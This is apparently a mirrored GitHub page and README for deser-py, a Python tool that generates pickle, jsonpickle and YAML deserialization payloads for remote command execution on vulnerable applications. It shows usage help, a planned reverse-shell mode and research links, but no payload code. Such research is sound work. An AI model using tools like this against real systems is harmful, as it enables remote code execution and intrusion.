https://github.com/klezvirus/deser-py

Python Deserialization Payload Generator
https://github.com/klezvirus/deser-py

deserialization deserialization-vulnerability jsonpickle pickle python pyyaml

Last synced: 5 months ago
JSON representation

Python Deserialization Payload Generator

• Host: GitHub
• URL: https://github.com/klezvirus/deser-py
• Owner: klezVirus
• License: gpl-3.0
• Created: 2020-03-08T20:34:22.000Z (over 5 years ago)
• Default Branch: master
• Last Pushed: 2020-03-15T14:27:18.000Z (over 5 years ago)
• Last Synced: 2025-03-31T19:21:14.912Z (6 months ago)
• Topics: deserialization, deserialization-vulnerability, jsonpickle, pickle, python, pyyaml
• Language: Python
• Homepage:
• Size: 21.5 KB
• Stars: 4
• Watchers: 2
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
# deser-py

Deser-py is a script to automatically generate serialized payloads for Python driven applications, which deserialize data from user input using one of the following vulnerable module:

* _pickle, cPickle

* jsonpickle

* yaml, ruamel.yaml

The generated payloads are designed to operate both with system and Popen, which allow to execute system commands on the target. When choosing among them, conisder that Popen, as a class, is considered more reliable than system to gain RCE capabilities.

This tool has been realised as part of a research on common deserialization issues. For further information, consider reading the following article:

* [The Big Problem of Serialisation](https://klezvirus.github.io/The_Big_Problem_of_Serialisation/)

## Usage

Using deser-py is very straightforward::

```

$ python3 deser-py.py -h

usage: deser-py.py [-h] [-d] [-s] [-v {os,subprocess}] -f {pickle,json,yaml,#}

                   [-c COMMAND]

deser-py - A simple serialization payload generator

optional arguments:

  -h, --help            show this help message and exit

  -d, --debug           Enable debug messages

  -s, --save            Save payload to file

  -v {os,subprocess}, --vector {os,subprocess}

                        Save payload to file

  -f {pickle,json,yaml,#}, --format {pickle,json,yaml,#}

                        Serialization archive format

  -c COMMAND, --command COMMAND

                        Command for the payload

```

## Requirements

In order to use **deser-py**, jsonpickle and PyYAML modules must be installed:

```

pip install -r requirements.txt

```

## TODO:

* Implement automatic reverse shell mode

* Implement encoding schemes:

    - base64

    - urlencoded

    - others

#### References

* [PyYAML - Exploit-DB](https://www.exploit-db.com/docs/47655)

* [Exploiting jsonpickle](https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/)